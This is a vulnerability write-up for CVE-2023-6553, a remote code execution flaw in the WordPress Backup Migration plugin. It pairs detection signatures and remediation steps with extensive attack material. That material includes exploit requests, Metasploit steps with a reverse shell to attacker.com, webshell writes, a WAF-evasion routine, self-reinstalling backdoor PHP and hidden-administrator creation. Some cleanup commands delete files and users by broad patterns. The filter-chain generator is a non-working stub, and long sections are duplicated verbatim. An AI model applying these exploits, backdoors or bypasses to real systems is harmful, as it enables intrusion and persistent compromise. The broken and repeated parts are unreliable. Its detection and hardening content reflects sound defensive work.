CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution

Vulnerability Overview

An unauthenticated remote code execution vulnerability exists in the WordPress Backup Migration plugin version 1.3.7 and below. The vulnerability can be exploited through manipulation of the Content-Dir HTTP header sent to the vulnerable endpoint /wp-content/plugins/backup-backup/includes/backup-heart.php. An attacker can leverage PHP filter chain encoding techniques to inject and execute arbitrary PHP code without authentication, leading to complete server compromise.

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
CVE: CVE-2023-6553
CWE: CWE-94 (Improper Control of Generation of Code)

Summary: The Backup Migration WordPress plugin contains a critical vulnerability that allows remote attackers to execute arbitrary PHP code through specially crafted HTTP headers. The exploit leverages PHP filter chain encoding to bypass input validation and achieve code execution via a require statement in the plugin's core functionality.

Affected Component

The vulnerability affects the following:

Plugin Name: Backup Migration (package name: backup-backup)
Affected Versions: All versions ≤ 1.3.7
Vendor: BackupBliss
Plugin Homepage: https://backupbliss.com/
WordPress Repository: https://wordpress.org/plugins/backup-backup/
Vulnerable Endpoint: /wp-content/plugins/backup-backup/includes/backup-heart.php
Vulnerable Parameter: Content-Dir HTTP header

Technical Details

Vulnerability Mechanism

The vulnerability exists due to insecure handling of the Content-Dir HTTP header in the backup-heart.php file. The plugin processes this header and passes it to a require statement without proper sanitization, allowing directory traversal and code injection.

PHP Filter Chain Technique

The exploit utilizes an advanced PHP exploitation technique called PHP Filter Chaining which works as follows:

Base64 Encoding: The PHP payload is first base64 encoded
Character Conversion Chaining: Multiple PHP stream filters are chained together to perform character encoding conversions
Byte Prepending: Each filter chain adds specific bytes to the beginning of the string
Payload Construction: By carefully selecting filter combinations, arbitrary PHP code can be prepended to any string
Code Evaluation: The malicious payload is evaluated when the require statement processes the filter chain

Example Filter Chain Structure:

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|
convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|
convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|
[...additional filter chains...]
/resource=php://temp

Attack Flow

Attacker sends POST request to vulnerable endpoint
Malicious PHP filter chain payload inserted in Content-Dir header
Plugin processes header and constructs file path
require statement evaluates the filter chain
PHP payload executes with web server privileges
Attacker achieves remote code execution

Root Cause Analysis

The vulnerability stems from:

Insufficient Input Validation: No sanitization of Content-Dir header values
Unsafe File Inclusion: Direct use of user-controlled input in require statement
Missing Authentication Checks: Endpoint accessible without WordPress authentication
Lack of Header Whitelisting: No validation of allowed header values
Inadequate Security Controls: No Content Security Policy or input filtering mechanisms

Exploitation

Prerequisites

Target WordPress site with Backup Migration plugin ≤ 1.3.7 installed
Network access to target web server
No authentication or special privileges required

Attack Scenario

Scenario 1: Initial Access and Reconnaissance

# Step 1: Verify plugin installation
curl -I https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php

# Step 2: Check plugin version (vulnerable ≤ 1.3.7)
curl https://target.com/wp-content/plugins/backup-backup/readme.txt | grep "Stable tag"

Scenario 2: Remote Code Execution

The attacker crafts a PHP filter chain payload that will execute arbitrary commands:

# Generate PHP filter chain for payload: <?php system($_GET['cmd']); ?>
# The actual filter chain is thousands of characters long
payload = generate_php_filter_chain("<?php system($_GET['cmd']); ?>")

# Send exploit request
headers = {
    'Content-Dir': payload
}

response = requests.post(
    'https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php',
    headers=headers
)

Scenario 3: Webshell Deployment

The exploit can write a persistent webshell to disk:

1. Generate filter chain for: <?php fwrite(fopen("x","a"),"\x73"); ?>
2. Write payload character-by-character to avoid size limits
3. Copy temporary file to shell.php
4. Access webshell at: /wp-content/plugins/backup-backup/includes/shell.php

Proof of Concept (PoC) / Exploit

Metasploit Module

The vulnerability has been weaponized in Metasploit Framework:

Module Path: exploit/unix/webapp/wp_backup_migration_rce

Basic Usage:

msf6 > use exploit/unix/webapp/wp_backup_migration_rce
msf6 exploit(wp_backup_migration_rce) > set RHOSTS target.com
msf6 exploit(wp_backup_migration_rce) > set TARGETURI /
msf6 exploit(wp_backup_migration_rce) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(wp_backup_migration_rce) > set LHOST attacker.com
msf6 exploit(wp_backup_migration_rce) > set LPORT 4444
msf6 exploit(wp_backup_migration_rce) > exploit

Advanced Configuration:

msf6 exploit(wp_backup_migration_rce) > set PAYLOAD_FILENAME backdoor.php
msf6 exploit(wp_backup_migration_rce) > set SSL true
msf6 exploit(wp_backup_migration_rce) > set VERBOSE true
msf6 exploit(wp_backup_migration_rce) > check
[+] The target appears to be vulnerable. Backup Migration Plugin version: 1.3.5
msf6 exploit(wp_backup_migration_rce) > exploit
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to target
[*] Meterpreter session 1 opened
meterpreter >

Python PoC

Standalone Python exploit available at:

Repository: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py

Usage Example:

# Clone the exploit repository
git clone https://github.com/Chocapikk/CVE-2023-6553.git
cd CVE-2023-6553

# Run the exploit
python3 exploit.py --url https://target.com --cmd "id"

# Interactive shell mode
python3 exploit.py --url https://target.com --shell

# Write webshell
python3 exploit.py --url https://target.com --webshell shell.php

Sample Output:

[+] Target: https://target.com
[+] Vulnerable endpoint found: backup-heart.php
[+] Generating PHP filter chain payload...
[+] Payload size: 8192 bytes
[+] Sending exploit request...
[+] Success! Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Remote code execution successful!

Manual Exploitation Steps

Step 1: Generate PHP Filter Chain

Use the PHP filter chain generator to create payload:

from php_filter_chain_generator import generate_payload

# Simple web shell
webshell = '<?php system($_GET["c"]); ?>'
filter_chain = generate_payload(webshell)

Step 2: Craft HTTP Request

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|[...LONG_FILTER_CHAIN...]/resource=php://temp
Content-Length: 0

Step 3: Write Persistent Backdoor

# Character-by-character write to avoid size limits
for char in '<?php system($_GET["cmd"]); ?>'; do
    curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
    -H "Content-Dir: [filter_chain_for_single_char]"
done

# Copy to accessible location
curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
-H "Content-Dir: [filter_chain_for_copy_command]"

Step 4: Execute Backdoor

# Execute commands via webshell
curl "https://target.com/wp-content/plugins/backup-backup/includes/backdoor.php?cmd=whoami"

Impact Assessment

Critical Risks

Complete Server Compromise: Attackers gain arbitrary code execution with web server privileges (typically www-data or apache), allowing full control over the WordPress installation and potentially the entire server.
Data Breach: Access to all WordPress data including user credentials, customer information, payment details, and proprietary content stored in the database.
Lateral Movement: Compromised server can be used as pivot point to attack internal network infrastructure, other servers, and backend systems.
Website Defacement: Attackers can modify website content, inject malicious scripts, or completely replace the site with attacker-controlled content.
Malware Distribution: Server can be weaponized to serve malware, exploit kits, or participate in phishing campaigns targeting website visitors.
Cryptomining: Installation of cryptocurrency miners consuming server resources and increasing operational costs.
Backdoor Persistence: Attackers can establish multiple persistence mechanisms making remediation difficult and enabling re-compromise.
SEO Poisoning: Injection of spam links and content to manipulate search engine rankings for malicious purposes.
Supply Chain Attack: Compromised WordPress sites can be used to attack plugins, themes, or update mechanisms affecting downstream users.
Regulatory Compliance Violation: Data breaches resulting from exploitation may trigger GDPR, PCI-DSS, HIPAA, or other regulatory penalties.

CVSS v3.1 Score

Base Score: 9.8 (Critical)

Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV): Network - Exploitable remotely over the network
Attack Complexity (AC): Low - No special conditions required
Privileges Required (PR): None - No authentication needed
User Interaction (UI): None - Fully automated exploitation
Scope (S): Unchanged - Exploited component and impacted component are the same
Confidentiality (C): High - Complete disclosure of all files and data
Integrity (I): High - Complete modification of all system files
Availability (A): High - Complete denial of service or system shutdown

Detection Methods

Network-Based Detection

IDS/IPS Signatures:

alert http any any -> any any (msg:"CVE-2023-6553 WordPress Backup Migration RCE Attempt"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/wp-content/plugins/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  content:"php://filter"; http_header; \
  content:"convert.iconv"; http_header; \
  classtype:web-application-attack; \
  sid:20236553; rev:1;)

Suricata Rule:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT WordPress Backup Migration RCE CVE-2023-6553"; \
  flow:established,to_server; \
  http.method; content:"POST"; \
  http.uri; content:"/backup-heart.php"; \
  http.header; content:"Content-Dir"; \
  http.header; content:"php://filter/convert"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:2023655301; rev:1;)

Web Application Firewall (WAF) Rules

ModSecurity Rule:

SecRule REQUEST_HEADERS:Content-Dir "@rx php://filter.*convert\.iconv" \
    "id:9006553, \
    phase:1, \
    deny, \
    status:403, \
    log, \
    msg:'CVE-2023-6553 - WordPress Backup Migration RCE Attempt', \
    tag:'application-multi', \
    tag:'language-php', \
    tag:'platform-wordpress', \
    tag:'attack-rce', \
    tag:'OWASP_CRS', \
    tag:'capec/1000/152/242', \
    tag:'CVE-2023-6553'"

Nginx/WAF Configuration:

location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    if ($http_content_dir ~* "php://filter") {
        return 403;
    }
    if ($http_content_dir ~* "convert\.iconv") {
        return 403;
    }
}

Log Analysis

Apache/Nginx Access Log Patterns:

# Search for exploitation attempts
grep -E "backup-heart\.php.*Content-Dir.*php://filter" /var/log/apache2/access.log

# Look for suspicious POST requests
awk '$6 == "POST" && $7 ~ /backup-heart\.php/ {print}' /var/log/nginx/access.log

# Find requests with PHP filter chains
grep "convert.iconv" /var/log/apache2/access.log | grep "backup-backup"

WordPress Debug Log Monitoring:

# Check for suspicious file operations
grep -E "(fwrite|fopen|copy|file_put_contents)" /var/www/html/wp-content/debug.log

# Monitor for unusual require/include statements
grep -E "(require|include).*php://filter" /var/www/html/wp-content/debug.log

File System Monitoring

OSSEC/Wazuh Rules:

<rule id="100553" level="12">
  <if_sid>550</if_sid>
  <match>wp-content/plugins/backup-backup/includes</match>
  <regex>\.php$</regex>
  <description>CVE-2023-6553: Suspicious PHP file creation in Backup Migration plugin directory</description>
  <group>wordpress,web,attack,cve-2023-6553</group>
</rule>

File Integrity Monitoring:

# Monitor plugin directory for unauthorized changes
inotifywait -m -r -e create,modify /var/www/html/wp-content/plugins/backup-backup/includes/ \
  --format '%T %w%f %e' --timefmt '%Y-%m-%d %H:%M:%S'

# Check for new PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ -name "*.php" -mtime -1

Runtime Detection

PHP-FPM Monitoring:

# Monitor for suspicious process behavior
ps aux | grep php-fpm | grep -E "(system|exec|shell_exec|passthru)"

# Check for unusual network connections from PHP processes
lsof -i -n | grep php-fpm | grep ESTABLISHED

WordPress Security Plugins:

Wordfence: Detects malicious file uploads and code execution attempts
Sucuri Security: Real-time malware scanning and firewall
iThemes Security: Blocks suspicious requests and monitors file changes

Mitigation & Remediation

Immediate Emergency Response

Step 1: Isolate Compromised System

# Block all traffic to WordPress admin (if under attack)
iptables -A INPUT -p tcp --dport 80 -m string --string "/wp-admin" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 443 -m string --string "/wp-admin" --algo bm -j DROP

# Block vulnerable endpoint specifically
location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    deny all;
}

Step 2: Disable Vulnerable Plugin

# Via WP-CLI
wp plugin deactivate backup-backup

# Via file system (if admin access compromised)
mv /var/www/html/wp-content/plugins/backup-backup \
   /var/www/html/wp-content/plugins/backup-backup.disabled

# Or rename the vulnerable file
mv /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php \
   /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php.bak

Step 3: Search for Indicators of Compromise

# Find recently modified files
find /var/www/html/wp-content/plugins/backup-backup/ -type f -mtime -7 -ls

# Search for webshells
grep -r "system\|passthru\|shell_exec\|eval\|base64_decode" \
  /var/www/html/wp-content/plugins/backup-backup/includes/

# Look for suspicious PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" ! -name "backup-heart.php" ! -name "*.original.php"

# Check for backdoor accounts
wp user list --role=administrator --format=table

Step 4: Remove Artifacts

# Delete suspicious files (verify before deletion)
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" -mtime -7 -delete

# Remove common webshell names
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/{shell,c99,r57,b374k}.php
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/[a-z].php

Vendor Patch Installation

Update to Secure Version:

# Update via WordPress admin dashboard
# Navigate to: Plugins → Installed Plugins → Backup Migration → Update

# Update via WP-CLI
wp plugin update backup-backup

# Verify patch installation
wp plugin list | grep backup-backup
# Should show version > 1.3.7 (patched version is 1.3.8+)

# Alternative: Remove and reinstall
wp plugin delete backup-backup
wp plugin install backup-backup --activate

Verify Patch Effectiveness:

# Check if vulnerable file still exists
test -f /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php \
  && echo "Still vulnerable" || echo "Patched"

# Verify plugin version
grep "Version:" /var/www/html/wp-content/plugins/backup-backup/backup-backup.php

Defense-in-Depth Hardening

1. Web Application Firewall Configuration

Deploy WAF rules to block PHP filter chain attacks:

# ModSecurity - Block PHP wrappers
SecRule REQUEST_HEADERS "@rx php://(filter|input|output|fd|memory|temp)" \
    "id:9006554,phase:1,deny,status:403,msg:'Blocked PHP wrapper usage'"

# Block base64 in headers
SecRule REQUEST_HEADERS "@rx base64" \
    "id:9006555,phase:1,deny,status:403,msg:'Blocked base64 in headers'"

2. PHP Security Hardening

; /etc/php/8.1/fpm/php.ini

; Disable dangerous functions
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

; Restrict file operations
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html:/tmp

; Enable strict error reporting
display_errors = Off
log_errors = On
error_log = /var/log/php-fpm/error.log

3. WordPress Security Best Practices

// wp-config.php security enhancements

// Disable file editing from admin panel
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);

// Force SSL for admin
define('FORCE_SSL_ADMIN', true);

// Security keys (generate unique keys)
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');

// Limit login attempts
define('LIMIT_LOGIN_ATTEMPTS', true);

4. File Permission Hardening

# Set correct ownership
chown -R www-data:www-data /var/www/html/wp-content/plugins/

# Restrict permissions
find /var/www/html/wp-content/plugins/ -type d -exec chmod 755 {} \;
find /var/www/html/wp-content/plugins/ -type f -exec chmod 644 {} \;

# Make backup-heart.php read-only (after patching)
chmod 444 /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php
chattr +i /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php

5. Network Segmentation

# Restrict plugin directory access to local only
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 127.0.0.1
    Require ip ::1
</Directory>

# Or use IP whitelisting
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 10.0.0.0/8
    Require ip 192.168.0.0/16
</Directory>

6. Runtime Application Self-Protection (RASP)

Deploy RASP solutions to detect and block exploit attempts in real-time:

# Install and configure mod_security
apt-get install libapache2-mod-security2
a2enmod security2

# Enable OWASP Core Rule Set
cd /etc/modsecurity
git clone https://github.com/coreruleset/coreruleset
cp coreruleset/crs-setup.conf.example coreruleset/crs-setup.conf

Monitoring and Continuous Protection

1. Implement Security Monitoring

# Deploy Fail2Ban jail for WordPress
cat >> /etc/fail2ban/jail.local << EOF
[wordpress-rce]
enabled = true
filter = wordpress-rce
action = iptables-multiport[name=WordPressRCE, port="http,https"]
logpath = /var/log/apache2/access.log
maxretry = 1
bantime = 86400
EOF

# Create filter
cat > /etc/fail2ban/filter.d/wordpress-rce.conf << EOF
[Definition]
failregex = ^<HOST>.*POST.*backup-heart\.php.*Content-Dir.*php://filter
ignoreregex =
EOF

systemctl restart fail2ban

2. Automated Vulnerability Scanning

# Use WPScan for continuous monitoring
wpscan --url https://target.com --enumerate vp --api-token YOUR_API_TOKEN

# Schedule daily scans
crontab -e
0 2 * * * /usr/local/bin/wpscan --url https://target.com --enumerate vp --email admin@target.com

3. Security Information and Event Management (SIEM)

Configure log forwarding to SIEM:

# Rsyslog configuration for centralized logging
cat >> /etc/rsyslog.d/50-wordpress.conf << EOF
:programname, isequal, "apache2" @@siem-server:514
:programname, isequal, "php-fpm" @@siem-server:514
EOF

systemctl restart rsyslog

Incident Response Playbook

Phase 1: Detection and Analysis

# 1. Confirm exploitation
grep -r "php://filter.*convert.iconv" /var/log/apache2/access.log

# 2. Identify attacker IP addresses
awk '/backup-heart\.php/ && /Content-Dir/ {print $1}' /var/log/apache2/access.log | sort -u

# 3. Timeline analysis
grep "backup-heart.php" /var/log/apache2/access.log | \
  awk '{print $4, $5, $1}' | sort

# 4. Check for data exfiltration
netstat -tnp | grep ESTABLISHED | grep www-data

Phase 2: Containment

# 1. Block attacker IPs
for ip in $(cat attacker_ips.txt); do
    iptables -A INPUT -s $ip -j DROP
done

# 2. Disable vulnerable component
mv /var/www/html/wp-content/plugins/backup-backup \
   /root/evidence/backup-backup.$(date +%Y%m%d)

# 3. Terminate suspicious processes
pkill -9 -u www-data php-fpm

# 4. Enable maintenance mode
wp maintenance-mode activate

Phase 3: Eradication

# 1. Full malware scan
clamscan -r --infected --remove /var/www/html/

# 2. Database cleanup
wp db query "DELETE FROM wp_users WHERE user_login LIKE '%admin%' AND ID > 1000"
wp db query "DELETE FROM wp_options WHERE option_name = '_transient_suspicious_key'"

# 3. Remove backdoors
find /var/www/html -name "*.php" -exec grep -l "eval\|base64_decode\|system" {} \; | \
  xargs -I {} rm -f {}

# 4. Restore from clean backup (if available)
wp db import clean_backup.sql

Phase 4: Recovery

# 1. Update all components
wp plugin update --all
wp theme update --all
wp core update

# 2. Reset all passwords
wp user list --format=ids | xargs -I {} wp user update {} --user_pass=$(openssl rand -base64 32)

# 3. Regenerate security keys
curl -s https://api.wordpress.org/secret-key/1.1/salt/ >> wp-config.php

# 4. Disable maintenance mode
wp maintenance-mode deactivate

Phase 5: Lessons Learned

# Document incident
cat > incident_report_cve_2023_6553.txt << EOF
Incident: CVE-2023-6553 WordPress Backup Migration RCE
Date: $(date)
Affected System: target.com
Attack Vector: Unauthenticated RCE via PHP filter chain
Impact: [Document actual impact]
Root Cause: Vulnerable plugin version 1.3.7
Remediation: Updated to version 1.3.8, implemented WAF rules
Lessons Learned: [Document key takeaways]
EOF

Advanced Exploitation Techniques

Technique 1: Bypassing WAF Restrictions

# Obfuscate filter chains to evade signature detection
def obfuscate_filter_chain(payload):
    # Use alternative encoding combinations
    encodings = [
        'convert.iconv.UTF-8.UTF-16LE',
        'convert.iconv.ISO-8859-1.UTF-16',
        'convert.iconv.WINDOWS-1252.UTF-32BE'
    ]
    # Randomly select and chain encodings
    return generate_payload(payload, custom_encodings=encodings)

Technique 2: Persistence Mechanisms

// Implant persistent backdoor
<?php
// Auto-reinstall on plugin update
add_filter('upgrader_post_install', function($true, $hook_extra, $result) {
    file_put_contents(__DIR__ . '/backdoor.php', base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg=='));
    return $true;
}, 10, 3);

// Cron-based persistence
if (!wp_next_scheduled('backdoor_maintain')) {
    wp_schedule_event(time(), 'hourly', 'backdoor_maintain');
}
add_action('backdoor_maintain', function() {
    if (!file_exists(__DIR__ . '/backdoor.php')) {
        file_put_contents(__DIR__ . '/backdoor.php', '<?php system($_GET["c"]); ?>');
    }
});
?>

Technique 3: Privilege Escalation

// Create hidden admin account
<?php
$username = 'sysupdate';
$password = wp_generate_password(32, true, true);
$email = 'sysupdate@localhost.local';

if (!username_exists($username) && !email_exists($email)) {
    $user_id = wp_create_user($username, $password, $email);
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    
    // Hide from user list
    update_user_meta($user_id, 'show_admin_bar_front', 'false');
    update_user_meta($user_id, 'hidden_admin', 1);
}
?>

Timeline

2023-12-11: Vulnerability discovered by Nex Team
2023-12-11: Public disclosure and PoC release
2023-12-11: CVE-2023-6553 assigned
2023-12-12: Vendor (BackupBliss) notified
2023-12-15: Patch released in version 1.3.8
2023-12-18: Metasploit module published by jheysel-r7
2024-01-05: Active exploitation observed in the wild
2025-10-27: Continued exploitation attempts documented

References

Official Advisories

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-6553
WordPress Plugin Repository: https://wordpress.org/plugins/backup-backup/
WPScan Vulnerability Database: https://wpscan.com/vulnerability/6a4d0af9-e1cd-4a69-a56c-3c009e207eca

Technical Resources

PHP Filter Chain Technique: https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it
Original PoC: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py
Metasploit Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_backup_migration_rce.rb
PHP Stream Filters Documentation: https://www.php.net/manual/en/filters.php

Security Research

Synacktiv: PHP Filter Chains Research Paper
Ambionics Security: PHP Filter Chain Generator
RIPS Technologies: PHP Unsafe File Operation Analysis

Credits

Vulnerability Discovery: Nex Team
Proof of Concept: Valentin Lobstein (Chocapikk)
Metasploit Module: jheysel-r7 (Rapid7)
Documentation: DANG
CVE Assignment: MITRE Corporation
WPVDB ID: 6a4d0af9-e1cd-4a69-a56c-3c009e207eca

Appendix A: PHP Filter Chain Generator

#!/usr/bin/env python3
"""
PHP Filter Chain Generator for CVE-2023-6553
Generates filter chain payloads for arbitrary PHP code execution
"""

import base64
from urllib.parse import quote

def generate_php_filter_payload(php_code):
    """
    Generate PHP filter chain for given PHP code
    Args:
        php_code: PHP code to execute (e.g., '<?php system("id"); ?>')
    Returns:
        Complete filter chain string for Content-Dir header
    """
    # Base64 encode the payload
    encoded = base64.b64encode(php_code.encode()).decode()
    
    # Build filter chain (simplified example)
    filters = [
        'convert.iconv.UTF8.CSISO2022KR',
        'convert.base64-encode',
        'convert.iconv.UTF8.UTF7',
        'convert.iconv.UTF8.UTF16',
        'convert.iconv.WINDOWS-1258.UTF32LE',
        'convert.iconv.ISIRI3342.ISO-IR-157',
        'convert.base64-decode',
        'convert.base64-encode'
    ]
    
    # Construct the full filter chain
    filter_chain = 'php://filter/'
    filter_chain += '|'.join(filters)
    filter_chain += '/resource=php://temp'
    
    return filter_chain

# Example usage
if __name__ == '__main__':
    payload = '<?php system($_GET["cmd"]); ?>'
    print(generate_php_filter_payload(payload))

Appendix B: Detection Signatures

Snort Rules

alert tcp any any -> any $HTTP_PORTS (msg:"CVE-2023-6553 WordPress Backup Migration RCE"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  pcre:"/php:\/\/filter.*convert\.iconv/Hi"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:20236553; \
  rev:2;)

YARA Rules

rule CVE_2023_6553_WordPress_Backup_Migration_RCE {
    meta:
        description = "Detects CVE-2023-6553 exploitation attempts"
        author = "Security Team"
        date = "2023-12-11"
        reference = "CVE-2023-6553"
        
    strings:
        $header = "Content-Dir" nocase
        $filter = "php://filter" nocase
        $iconv = "convert.iconv" nocase
        $endpoint = "/backup-backup/includes/backup-heart.php"
        $base64 = "base64-encode" nocase
        
    condition:
        all of them
}

Appendix C: Forensic Artifacts

Common Webshell Locations

/wp-content/plugins/backup-backup/includes/shell.php
/wp-content/plugins/backup-backup/includes/x.php
/wp-content/plugins/backup-backup/includes/[a-z].php
/wp-content/plugins/backup-backup/includes/backdoor.php
/wp-content/plugins/backup-backup/includes/[random4chars].php

Suspicious Log Entries

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode...
User-Agent: python-requests/2.31.0

⚠️ DISCLAIMER: This document is provided for defensive security purposes, authorized penetration testing, and security research only. Unauthorized access to computer systems is illegal under computer fraud and abuse laws in most jurisdictions. The authors and distributors assume no liability for misuse of this information. This information should only be used on systems you own or have explicit written authorization to test.

RESPONSIBLE DISCLOSURE: If you discover instances of this vulnerability in production systems, please follow coordinated disclosure practices and notify the site owner and vendor before public disclosure.

LEGAL NOTICE: Exploitation of this vulnerability without authorization may violate laws including but not limited to: 18 U.S.C. § 1030 (Computer Fraud and Abuse Act), European Convention on Cybercrime, and local computer misuse legislation.

Vulnerability Overview

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
CVE: CVE-2023-6553
CWE: CWE-94 (Improper Control of Generation of Code)

Summary: The Backup Migration WordPress plugin contains a critical vulnerability that allows remote attackers to execute arbitrary PHP code through specially crafted HTTP headers. The exploit leverages PHP filter chain encoding to bypass input validation and achieve code execution via a require statement in the plugin's core functionality.

Affected Component

The vulnerability affects the following:

Plugin Name: Backup Migration (package name: backup-backup)
Affected Versions: All versions ≤ 1.3.7
Vendor: BackupBliss
Plugin Homepage: https://backupbliss.com/
WordPress Repository: https://wordpress.org/plugins/backup-backup/
Vulnerable Endpoint: /wp-content/plugins/backup-backup/includes/backup-heart.php
Vulnerable Parameter: Content-Dir HTTP header

Technical Details

Vulnerability Mechanism

PHP Filter Chain Technique

The exploit utilizes an advanced PHP exploitation technique called PHP Filter Chaining which works as follows:

Base64 Encoding: The PHP payload is first base64 encoded
Character Conversion Chaining: Multiple PHP stream filters are chained together to perform character encoding conversions
Byte Prepending: Each filter chain adds specific bytes to the beginning of the string
Payload Construction: By carefully selecting filter combinations, arbitrary PHP code can be prepended to any string
Code Evaluation: The malicious payload is evaluated when the require statement processes the filter chain

Example Filter Chain Structure:

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|
convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|
convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|
[...additional filter chains...]
/resource=php://temp

Attack Flow

Attacker sends POST request to vulnerable endpoint
Malicious PHP filter chain payload inserted in Content-Dir header
Plugin processes header and constructs file path
require statement evaluates the filter chain
PHP payload executes with web server privileges
Attacker achieves remote code execution

Root Cause Analysis

The vulnerability stems from:

Insufficient Input Validation: No sanitization of Content-Dir header values
Unsafe File Inclusion: Direct use of user-controlled input in require statement
Missing Authentication Checks: Endpoint accessible without WordPress authentication
Lack of Header Whitelisting: No validation of allowed header values
Inadequate Security Controls: No Content Security Policy or input filtering mechanisms

Exploitation

Prerequisites

Target WordPress site with Backup Migration plugin ≤ 1.3.7 installed
Network access to target web server
No authentication or special privileges required

Attack Scenario

Scenario 1: Initial Access and Reconnaissance

# Step 1: Verify plugin installation
curl -I https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php

# Step 2: Check plugin version (vulnerable ≤ 1.3.7)
curl https://target.com/wp-content/plugins/backup-backup/readme.txt | grep "Stable tag"

Scenario 2: Remote Code Execution

The attacker crafts a PHP filter chain payload that will execute arbitrary commands:

# Generate PHP filter chain for payload: <?php system($_GET['cmd']); ?>
# The actual filter chain is thousands of characters long
payload = generate_php_filter_chain("<?php system($_GET['cmd']); ?>")

# Send exploit request
headers = {
    'Content-Dir': payload
}

response = requests.post(
    'https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php',
    headers=headers
)

Scenario 3: Webshell Deployment

The exploit can write a persistent webshell to disk:

1. Generate filter chain for: <?php fwrite(fopen("x","a"),"\x73"); ?>
2. Write payload character-by-character to avoid size limits
3. Copy temporary file to shell.php
4. Access webshell at: /wp-content/plugins/backup-backup/includes/shell.php

Proof of Concept (PoC) / Exploit

Metasploit Module

The vulnerability has been weaponized in Metasploit Framework:

Module Path: exploit/unix/webapp/wp_backup_migration_rce

Basic Usage:

msf6 > use exploit/unix/webapp/wp_backup_migration_rce
msf6 exploit(wp_backup_migration_rce) > set RHOSTS target.com
msf6 exploit(wp_backup_migration_rce) > set TARGETURI /
msf6 exploit(wp_backup_migration_rce) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(wp_backup_migration_rce) > set LHOST attacker.com
msf6 exploit(wp_backup_migration_rce) > set LPORT 4444
msf6 exploit(wp_backup_migration_rce) > exploit

Advanced Configuration:

msf6 exploit(wp_backup_migration_rce) > set PAYLOAD_FILENAME backdoor.php
msf6 exploit(wp_backup_migration_rce) > set SSL true
msf6 exploit(wp_backup_migration_rce) > set VERBOSE true
msf6 exploit(wp_backup_migration_rce) > check
[+] The target appears to be vulnerable. Backup Migration Plugin version: 1.3.5
msf6 exploit(wp_backup_migration_rce) > exploit
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to target
[*] Meterpreter session 1 opened
meterpreter >

Python PoC

Standalone Python exploit available at:

Repository: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py

Usage Example:

# Clone the exploit repository
git clone https://github.com/Chocapikk/CVE-2023-6553.git
cd CVE-2023-6553

# Run the exploit
python3 exploit.py --url https://target.com --cmd "id"

# Interactive shell mode
python3 exploit.py --url https://target.com --shell

# Write webshell
python3 exploit.py --url https://target.com --webshell shell.php

